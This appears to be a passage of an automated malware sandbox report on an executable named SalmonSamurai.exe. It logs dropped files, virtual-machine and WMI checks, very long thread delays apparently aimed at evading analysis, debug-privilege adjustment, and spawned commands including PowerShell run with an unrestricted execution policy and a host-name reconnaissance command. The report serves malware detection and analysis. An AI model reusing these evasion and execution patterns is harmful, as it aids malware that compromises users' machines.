Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened / queried: C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4395Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3980
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3646
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1647
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1104
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1320
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2557
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 595
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 844
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 937
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1104
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5342
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4407
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6289
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3215
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1370
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 984
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1318
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1401
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 818
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1530
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 928
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exeJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\vk_swiftshader.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep count: 4395 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5572Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3952Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep count: 3980 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7076Thread sleep count: 152 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5576Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3944Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7036Thread sleep count: 3646 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5580Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4376Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep count: 1647 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3232Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4808Thread sleep count: 1104 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1516Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3896Thread sleep count: 1320 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 608Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2156Thread sleep count: 2557 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6844Thread sleep count: 595 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920Thread sleep count: 937 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4308Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3264Thread sleep count: 1104 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep count: 5342 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep count: 4407 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep count: 6289 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep count: 3215 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep count: 1370 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 960Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep count: 984 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4808Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep count: 1318 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6744Thread sleep count: 1401 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1552Thread sleep count: 818 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3988Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep count: 1530 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7280Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1788Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6620Thread sleep count: 928 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\Roaming\NsisExtracted\resources\app.asarJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\Roaming\NsisExtracted\resourcesJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\Roaming\NsisExtractedJump to behavior
Source: SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: VMware Fusion 4 has corrupt rendering with Win Vista+
Source: SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: VMware can crash with older drivers and WebGL content
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
